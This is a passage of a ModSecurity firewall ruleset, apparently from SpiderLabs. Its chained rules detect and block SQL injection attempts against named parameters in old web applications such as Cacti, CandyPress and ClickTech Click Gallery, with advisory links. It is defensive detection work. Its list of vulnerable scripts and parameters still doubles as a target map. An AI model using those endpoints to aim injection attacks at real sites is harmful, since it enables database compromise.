UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php order UPDATE SecRule REQUEST_LINE "@contains /torrents.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004996,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php order UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/18549'" SecRule &TX:'/SQL_INJECTION.*ARGS:order/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php order UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003781) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yilmaz Blog SQL Injection Attempt -- bry.asp id UPDATE SecRule REQUEST_LINE "@contains /bry.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003781,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yilmaz Blog SQL Injection Attempt -- bry.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23678'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yilmaz Blog SQL Injection Attempt -- bry.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006254) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP kid UPDATE SecRule REQUEST_LINE "@contains /HABERLER.ASP" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006254,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP kid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5085'" SecRule &TX:'/SQL_INJECTION.*ARGS:kid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP kid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006260) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP id UPDATE SecRule REQUEST_LINE "@contains /HABERLER.ASP" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006260,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5085'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- HABERLER.ASP id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006266) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP id UPDATE SecRule REQUEST_LINE "@contains /ASPKAT.ASP" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006266,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5085'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006272) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP kid UPDATE SecRule REQUEST_LINE "@contains /ASPKAT.ASP" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006272,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP kid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5085'" SecRule &TX:'/SQL_INJECTION.*ARGS:kid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- ASPKAT.ASP kid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006278) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- down.asp id UPDATE SecRule REQUEST_LINE "@contains /down.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006278,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- down.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21676'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Burak Yylmaz Download Portal SQL Injection Attempt -- down.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003798) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid UPDATE SecRule REQUEST_LINE "@contains /stylesheet.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003798,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23753'" SecRule &TX:'/SQL_INJECTION.*ARGS:templateid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2009979) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009979,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/9727'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_menu/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007892) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability graph_view graph_list UPDATE SecRule REQUEST_LINE "@contains graph_view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007892,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability graph_view graph_list UPDATE',tag:'web-application-attack',tag:'bugtraq,27749'" SecRule &TX:'/SQL_INJECTION.*ARGS:graph_list/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability graph_view graph_list UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007897) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id UPDATE SecRule REQUEST_LINE "@contains tree.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007897,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id UPDATE',tag:'web-application-attack',tag:'bugtraq,27749'" SecRule &TX:'/SQL_INJECTION.*ARGS:leaf_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cacti SQL Injection Vulnerability tree.php leaf_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006170) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Calendar MX BASIC SQL Injection Attempt -- calendar_detail.asp ID UPDATE SecRule REQUEST_LINE "@contains /calendar_detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006170,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Calendar MX BASIC SQL Injection Attempt -- calendar_detail.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2993'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Calendar MX BASIC SQL Injection Attempt -- calendar_detail.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006188) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Newsletter MX SQL Injection Attempt -- admin_mail_adressee.asp ID UPDATE SecRule REQUEST_LINE "@contains /admin/admin_mail_adressee.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006188,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Newsletter MX SQL Injection Attempt -- admin_mail_adressee.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2998'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Newsletter MX SQL Injection Attempt -- admin_mail_adressee.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007469) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- openPolicy.asp policy UPDATE SecRule REQUEST_LINE "@contains /openPolicy.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007469,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- openPolicy.asp policy UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21090/info'" SecRule &TX:'/SQL_INJECTION.*ARGS:policy/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- openPolicy.asp policy UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007475) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- prodList.asp brand UPDATE SecRule REQUEST_LINE "@contains /prodList.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007475,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- prodList.asp brand UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21090/info'" SecRule &TX:'/SQL_INJECTION.*ARGS:brand/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CandyPress Store SQL Injection Attempt -- prodList.asp brand UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007228) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Blog SQL Injection Attempt -- displayCalendar.asp date UPDATE SecRule REQUEST_LINE "@contains /displayCalendar.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007228,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Blog SQL Injection Attempt -- displayCalendar.asp date UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21310'" SecRule &TX:'/SQL_INJECTION.*ARGS:date/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Blog SQL Injection Attempt -- displayCalendar.asp date UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007234) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp currentpage UPDATE SecRule REQUEST_LINE "@contains /view_gallery.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007234,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp currentpage UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:currentpage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp currentpage UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007240) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp gallery_id UPDATE SecRule REQUEST_LINE "@contains /view_gallery.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007240,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp gallery_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:gallery_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_gallery.asp gallery_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007246) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- download_image.asp image_id UPDATE SecRule REQUEST_LINE "@contains /download_image.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007246,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- download_image.asp image_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:image_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- download_image.asp image_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007252) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp currentpage UPDATE SecRule REQUEST_LINE "@contains /gallery.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007252,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp currentpage UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:currentpage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp currentpage UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007258) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp orderby UPDATE SecRule REQUEST_LINE "@contains /gallery.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007258,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp orderby UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:orderby/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- gallery.asp orderby UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007264) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_recent.asp currentpage UPDATE SecRule REQUEST_LINE "@contains /view_recent.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007264,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_recent.asp currentpage UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452733/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:currentpage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech Click Gallery SQL Injection Attempt -- view_recent.asp currentpage UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007270) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp AlphaSort UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007270,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp AlphaSort UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21302'" SecRule &TX:'/SQL_INJECTION.*ARGS:AlphaSort/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp AlphaSort UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007276) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp In UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007276,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp In UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21302'" SecRule &TX:'/SQL_INJECTION.*ARGS:In/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp In UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007282) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp orderby UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007282,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp orderby UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21302'" SecRule &TX:'/SQL_INJECTION.*ARGS:orderby/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClickTech ClickContact SQL Injection Attempt -- default.asp orderby UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CodeAvalanche News SQL Injection Attempt -- inc_listnews.asp CAT_ID UPDATE SecRule REQUEST_LINE "@contains /inc_listnews.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004880,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS CodeAvalanche News SQL Injection Attempt -- inc_listnews.asp CAT_ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3317'" SecRule &TX:'/SQL_INJECTION.*ARGS:CAT_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CodeAvalanche News SQL Injection Attempt -- inc_listnews.asp CAT_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006509) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Comersus Shop Cart SQL Injection Attempt -- comersus_optReviewReadExec.asp idProduct UPDATE SecRule REQUEST_LINE "@contains /comersus_optReviewReadExec.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006509,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Comersus Shop Cart SQL Injection Attempt -- comersus_optReviewReadExec.asp idProduct UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24562'" SecRule &TX:'/SQL_INJECTION.*ARGS:idProduct/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Comersus Shop Cart SQL Injection Attempt -- comersus_optReviewReadExec.asp idProduct UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004640) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004640,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/470598/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:epi/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004710) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage UPDATE SecRule REQUEST_LINE "@contains /admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004710,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3352'" SecRule &TX:'/SQL_INJECTION.*ARGS:uploadimage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- admin.php uploadimage UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004716) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004716,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3352'" SecRule &TX:'/SQL_INJECTION.*ARGS:p_skin/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Connectix Boards SQL Injection Attempt -- index.php p_skin UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007341) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ContentNow SQL Injection Attempt -- index.php pageid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007341,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS 